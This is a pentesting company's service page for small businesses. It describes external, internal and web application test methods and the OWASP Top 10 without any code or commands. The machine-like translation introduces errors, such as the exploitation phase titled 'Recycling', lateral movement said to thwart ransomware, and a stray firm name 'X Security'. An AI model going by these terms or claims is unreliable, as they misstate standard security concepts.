Pentesting Services

Small and medium-sized companies often do not have sufficient internal resources to adequately protect data and tools from unwanted access. This is where the specialists from Koller Engineering come into play. Our approach is clearly structured and transparent. We uncover possible weak points and make recommendations for action so that they can sleep peacefully again. Ask for a non-binding offer: Contact

Pentesting services for SMBs. Request a quote now:

Our toolbox includes proven and new methods. A comprehensive picture of the situation shows where minimum standards and norms are adhered to and where action is needed. We also accompany our customers over longer periods of time and carry out regular scans and audits.

External Network Penetration Test

Setting up a strong perimeter

One of the most common forms of penetration testing, especially for SMEs, is an external network pentest. In this form of pentest, all systems in the vicinity of a company are checked, i.e. all systems that are publicly accessible via the Internet. Because these systems are accessible to everyone, they are a company’s most easily and regularly vulnerable systems. They are likely to be scanned and attacked almost daily. Most of these attacks are automated and try to find simple vulnerabilities – but that shouldn’t distract from the fact that even a small vulnerability can have a significant impact.

The difference between an internal network penetration test and an external network penetration test is that an external network pentest assesses a company’s security posture from the perspective of a stranger who could be sitting thousands of miles away from the target. This perspective helps an organization understand how effective its external security posture is while identifying misconfigured controls or vulnerabilities that could be exploited from anywhere in the world.

What does an external network test check?

  • Misconfigured firewall rules
  • Open ports
  • Ineffective IDS
  • Weak password policies
  • Unpatched Systems
  • Shared cloud resources

External Network Test Methodology

The importance of a structured and consistent methodology in external network penetration testing should not be underestimated. While each project differs in scope, objectives, and tools needed, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process that ensures the quality of work at each audit.

Step 1: Collect information and list

The first step we take in evaluating a company’s external network is to collect and list information about the target; this is also known as the reconnaissance phase. This step is critical because it creates a solid foundation of information that can later be used to identify vulnerabilities and attack vectors. In penetration testing, there are 2 different forms of exploration:

  • Passive reconnaissance is the process of identifying information without ever interacting directly with the target environment. Good examples of passive intelligence are reviewing databases with breached credentials or reviewing job postings to find out what types of tools are used in the company.
  • Active exploration is the process of reconnaissance where the target application is approached directly. Our auditors use a number of different IP block and system scanning tools to gather information about the hardware, hosts, and firmware.

Step 2: Modeling the threat

Threat modeling is an essential but often overlooked step for a high-quality pentest. In this phase, auditors use the previously learned information to capture the network architecture, operating systems, open ports, and underlying services. Another important part of threat modeling is categorizing the different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

As soon as auditors enter the vulnerability assessment phase, they begin using tools to identify potential vulnerabilities in the environment. Automated tools help identify easy-to-discover vulnerabilities before our team moves on to where we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. The answer varies by scope, but we regularly rely on a few commercial tools we’ve integrated ourselves, such as Burpsuite Pro, Metasploit, and Nessus.

Step 4: Recycling

In this phase of penetration testing, we begin by securely exploiting identified vulnerabilities and misconfigurations to determine what impact the various outcomes may have on the business. Our team will try to gain access to the devices and systems to penetrate the internal network. In the exploitation phase, auditors can better understand how the various vulnerabilities affect the business and help the customer prioritize remediation. This plays an important role in creating a report that provides the client with actionable next steps. Below are some examples of vulnerabilities that we try to exploit in an external network pentest.

  • Compromising remote external services: With the introduction of remote work, more and more companies are relying on services that allow employees to access internal corporate network resources from remote locations. Our auditors try to gain access to these remote service gateways to gain a foothold in the environment.
  • Exploit public-facing applications: Applications, databases, and network device administration and management protocols often have programs that target the Internet and could be exploited by malicious actors. We help with the evaluation of these systems and portals.
  • Standard and staff accounts: Software, operating systems, and devices have set up default accounts that may still be in use. Attackers will try to misuse credentials to gain access to an environment. In addition, employees can reuse credentials that have already been compromised in other attacks (e.g., Google email/password), so our team uses a proprietary database of breached credentials to investigate this type of attack path.

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their network environment. At this stage, we summarize all the results of the pentest and compile them into a report What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It’s important to highlight the value of a good pentest report – it helps with strategic decisions and budgets, it is provided to auditors for compliance with rules and regulations,  and it can be made available to enterprise customers who require their suppliers  to pay annual pentests.

Step 6: Tests to fix the deficiencies and update the reports

After implementing the remediation steps described in the report as a customer, our testers conduct a remediation test to ensure that not only have all previously identified vulnerabilities been eliminated, but also that no new vulnerabilities have emerged during the remediation process. We will update the report and prepare a summary document that reflects the resolved state.

Internal Network Penetration Test

Thorough defense

Internal network tests are an evaluation of all systems in the (internal) corporate network. Conducting an internal network test looks at what would happen if someone around you were to gain a foothold; this could be done by exploiting the external network, by using an employee’s credentials, or by a malicious action by an employee. Traditionally, companies have assumed they are safe if they have a hardened perimeter, but time has shown that you need much more than that. An egg is a common analogy when it comes to a poorly secured network: You don’t want a hard exterior (eggshell) and then a soft interior with little to no security.

What is checked during an internal network test?

  • Insufficient network segmentation
  • Open ports
  • Insufficient controls for user management
  • Unpatched Systems
  • Weak password policies
  • Use of insecure protocols

Internal network pentest methodology

The importance of a structured and consistent methodology in internal network penetration testing cannot be underestimated. While each project differs in scope, objectives, and tools needed, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process that ensures the quality of work at each audit.

Step 1: Collect information and enumerate

The first step our auditors take in evaluating a company’s internal network is to collect and enumerate information about the target; this is also known as the reconnaissance phase. This step is critical because it creates a solid foundation of information that can later be used to identify vulnerabilities and attack vectors. In penetration testing, there are 2 different forms of exploration:

  • Passive reconnaissance is the process of identifying information without ever interacting directly with the target environment. Good examples of passive intelligence are reviewing databases with breached credentials or reviewing job postings to find out what types of tools are used in the company.
  • Active exploration is the process of reconnaissance in which the target environment is directly examined. Our auditors use a number of different IP block and system scanning tools to gather information about hardware, hosts, and firmware.

Step 2: Modeling the threat

Threat modeling is an important but often overlooked step for a high-quality pentest. In this phase, auditors use the previously learned information to capture the network architecture, operating systems, open ports, and underlying services. Another important part of threat modeling is categorizing the different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

As soon as auditors enter the vulnerability assessment phase, they begin using tools to identify potential vulnerabilities in the environment. Automated tools help identify easy-to-discover vulnerabilities before our team moves on to the point we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. While the answer varies by scope, we regularly rely on a few commercial tools we’ve integrated ourselves, such as Burpsuite Pro, Metasploit, and Nessus.

Step 4: Recycling

In this phase of penetration testing, we begin by securely exploiting identified vulnerabilities and misconfigurations to determine what impact the various outcomes may have on the business. Our team will try to gain access to the devices and systems to penetrate the internal network. In the exploitation phase, auditors can better understand how the various vulnerabilities can affect the business and help the client prioritize remediation. This plays an important role in creating a report that provides the client with actionable next steps. Below are some examples of vulnerabilities that our auditors attempt to exploit in an internal network test.

  • Man-in-the-middle attacks: Attackers who have gained a foothold in the internal network can perform so-called MITM attacks, in which network protocols such as LLMNR can be misused. Through a MITM attack, an attacker can trick users into believing that it is a legitimate system and intercept information such as credentials.
  • Lateral displacement: The reason lateral movement can have such a big impact is because when an attacker first gains access to the internal network, the likelihood that they have the right access to the most important data is (probably) low. An attacker will perform activities such as misusing protocols (such as RDP) to move sideways and extend their access. Successful lateral movements can cause serious damage if the internal network is not properly hardened and segmented. Successful lateral movements also play a big role in thwarting ransomware campaigns.
  • Common and critical vulnerabilities: If an environment is not continuously patched properly, attackers can exploit some known and malicious CVEs such as EternalBlue (CVE-2017-0144), Spectre (CVE-2017-5753 & CVE-2017-5715), and Meltdown (CVE-2017-5754).

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their network environment. In this phase, we summarize all the results of the pentest and compile them in a report for our customers. What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It’s important to highlight the value of a good pentest report – it helps with strategic decisions and budgets, it is provided to auditors for compliance with rules and regulations, and it can be made available to enterprise customers who require annual pentests from their third-party service providers. 

Step 6: Tests to fix the deficiencies and update the reports

After a client has followed the remediation steps described in the report, our auditors conduct a remediation test to ensure that not only have all previously identified vulnerabilities been eliminated, but also that no new vulnerabilities have emerged during the remediation process. We will also issue an updated report and summary document reflecting the resolved condition.

Application penetration testing

Expansion of web apps, mobile applications and APIs

Applications and the way we interact with them have evolved over the years and are more just static brochures hosted online. Applications have become increasingly complex due to their reliance on user input, third-party libraries, APIs, containers, and more .

Applications have changed both the enterprise and consumer landscapes. Entire companies sell complex applications that solve everyday business problems, while the average consumer entrusts the applications with some of their most sensitive data: photo IDs, credit card numbers, and social security numbers.

The importance of applications more time – and with it the attention they attract from cybercriminals.

Application Pentests – OWASP Top 10

Our application evaluation team consists of members who have a deep understanding of applications as well as the tactics, techniques and processes commonly used by today’s cybercriminals. Experienced software developers have adopted the so-called OWASP Top 10, which serves as a guide for identifying the most common application security vulnerabilities. While the OWASP Top 10 provides a good starting point, it does not contain advanced vulnerabilities and flaws in business logic. Vulnerability scanners and less experienced pentesters that rely solely on the OWASP Top 10 may miss more subtle and serious insights that can be exploited. Still, software developers who build in exams for the OWASP Top 10 are one step ahead of those who don’t. Below is an overview of the OWASP Top 10 for 2021.

1. Defective access control

When access controls are configured correctly, an application enforces policies to ensure that users cannot act outside their assigned permissions. In other words, the application allows some users to access certain content and features, while denying others that access. Defective access controls can lead to inadvertent disclosure of information, destruction or alteration of data, and unintended functions that may be abused by a user.

2. Cryptographic failures

Cryptographic errors occur when sensitive data is not stored securely. This is about ensuring that your most important data is encrypted when needed and that the keys are properly managed.

3. Injection

The various forms of injection, which ranked No. 1 from 2010 to 2020, occur when an attacker tries to inject malicious code into an application, which is then interpreted or executed by the application. This can allow attackers to do whatever they want with the contents of your database, compromise back-end systems, or maliciously attack other users.

4. Unsafe design

The “Unsafe Design” category, which was added in 2021, is rather vague, but shifts the focus to design and architectural flaws that should be detected earlier in the development process. OWASP adopts the shift-left mentality and calls for more threat modeling, secure design patterns, and reference architectures.

5. Misconfiguration of security

Security misconfigurations refer to improper server or application configurations that lead to a number of vulnerabilities. This can include incorrect permissions to exposed directories or management consoles, the use of default credentials, or misconfigured cloud environments.

6. Vulnerable and refurbished components

When creating an application, vulnerable and obsolete components can be used. Examples include using unpatched servers or vulnerable third-party libraries.

7. Identification and authentication errors

If a user’s identity, authentication, and session details are not handled properly, there may be certain vulnerabilities that can be exploited. Authentication and identification means that you are who you say you are. Attacks that target passwords, keys, or session tokens that allow an attacker to impersonate a user therefore fall into this category.

8. Software and Data Integrity Deficiencies

This category, newly introduced in 2021, refers to code and infrastructure that do not protect against integrity violations. An example of this would be an automatic software update that is installed without checking the security of the new code.

9. Security logging and monitoring of errors

This category includes issues related to detection, escalation, and response to active incidents. Insufficient logging, detection, and monitoring can prevent security incidents from being detected and mitigated.

10. Server-side request forgery (SSRF)

SSRF attacks occur when a malicious actor misuses functions of the server to read or update internal resources. These attacks can allow access to servers that should not be accessible over the Internet.

Pentest methodology for web applications

The importance of a structured and consistent methodology for penetration testing of web applications cannot be underestimated. While each project differs in scope, objectives, and tools required, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process to ensure that quality work is done on every audit.

Step 1: Collect information and enumerate

The first step X Security takes when pentesting web applications is to collect and enumerate information about the target; this is also commonly referred to as the exploration phase. This step is critical because it creates a solid foundation of information that can later be used to identify vulnerabilities and attack vectors. In penetration testing, there are 2 different forms of exploration:

  • Passive reconnaissance is the process of identifying information without ever interacting directly with the target application. Good examples of passive reconnaissance include using Google-Fu to enumerate interesting subdomains or checking Github repos for
  • Active exploration is the process of reconnaissance in which the target application is directly examined. Examples of active reconnaissance include fingerprinting the application, generating and analyzing error codes, and scanning for open ports.

Step 2: Threat Modeling

Threat modeling is an essential but often overlooked step for a high-quality pentest. At this stage, auditors use previously learned information to identify sensitive data, areas of interest, and business logic to be further investigated. Another important part of threat modeling is categorizing different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

Once auditors enter the vulnerability assessment phase, they use tools to carefully identify vulnerabilities in the application. Automated tools help identify low-hanging vulnerabilities before our team moves to where we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. While the answer varies by scope, we regularly rely on a few commercial tools we’ve integrated ourselves, such as Burpsuite Pro, Metasploit, and Nessus.

Step 4: Recycling

At this stage of penetration testing, we begin by securely exploiting the identified vulnerabilities and misconfigurations to determine what impact the various outcomes would have on the business. The recovery phase allows auditors to better understand how the various vulnerabilities would affect the business and ultimately helps the client prioritize their remedial actions. Below are some of the issues our reviewers try to exploit in a web application pentest.

  • Cross-Site Scripting (XSS): A nefarious actor can inject malicious code that is executed on an unsuspecting user. This can allow the attacker to impersonate the victim, intercept their credentials, or even redirect them from a legitimate website to a malicious website.
  • SQL injection: Attackers can disrupt the application’s queries to its database. This can allow someone to view sensitive data from the database, make changes to the database, or even delete the database.
  • Flaw in business logic: When design/development teams make false assumptions about how users can interact with the application, it opens up opportunities that can be abused by an attacker. A common example is business bypass, which assumes that all users will go through a specific process. (A malicious actor might be able to skip this process, which could lead to errors that reveal sensitive information.

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their web application. In this phase, we summarize all the results of the pentest and compile them in a report. What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It’s important to highlight the value of a good pentest report –  it helps with strategic decisions and budgets, it is provided to auditors for compliance with rules and regulations, and it can be made available to enterprise customers who require annual pentests from their third-party service providers. 

Step 6: Tests to fix the deficiencies and update the reports

After a client has followed the remediation steps described in the report, our auditors conduct a remediation test to ensure that not only have all previously identified vulnerabilities been eliminated, but also that no new vulnerabilities have emerged during the remediation process. We will also issue an updated report and summary document reflecting the resolved condition.

Ransomware Readiness Assessment

We help our customers understand how to take action against a comprehensive list of ransomware strains. We review the necessary controls and policies that can mitigate the impact of new ransomware strains. Our Ransomware Preparedness Assessment is a proactive approach to addressing the ransomware issues that all organizations worry about.

Actionable Pentest Report

Our reports document every step of the job in a clear and concise manner. The reports include a summary that translates highly technical findings into information for senior management. You will also notice that our reports contain detailed information on the technical findings, their reproducibility and the ways to fix them. Along with these insights, you will receive guidance on best practices to further strengthen your security posture.

Why should they work with us?

Experience.

We have a small team that focuses exclusively on penetration testing. Our experience comes from years of working in the most prestigious penetration testing companies with some of the largest customers around the world. Each team member has an aggressive security background and years of experience conducting pentests. 

Purpose.

Granted, companies with a mission or purpose are a cliché these days. Nevertheless, the increasing focus of cybercriminals on SMEs is a cause for concern. We believe that the lack of pentesting companies positioned for the SMB market is one of the main causes of this – if the SMB market does not know where its most critical vulnerabilities lie, how can it make the right investments to strengthen its security posture?

So that’s our goal. We want to help the SME market improve its security situation.

Dieser Beitrag ist auch verfügbar auf: DE FR IT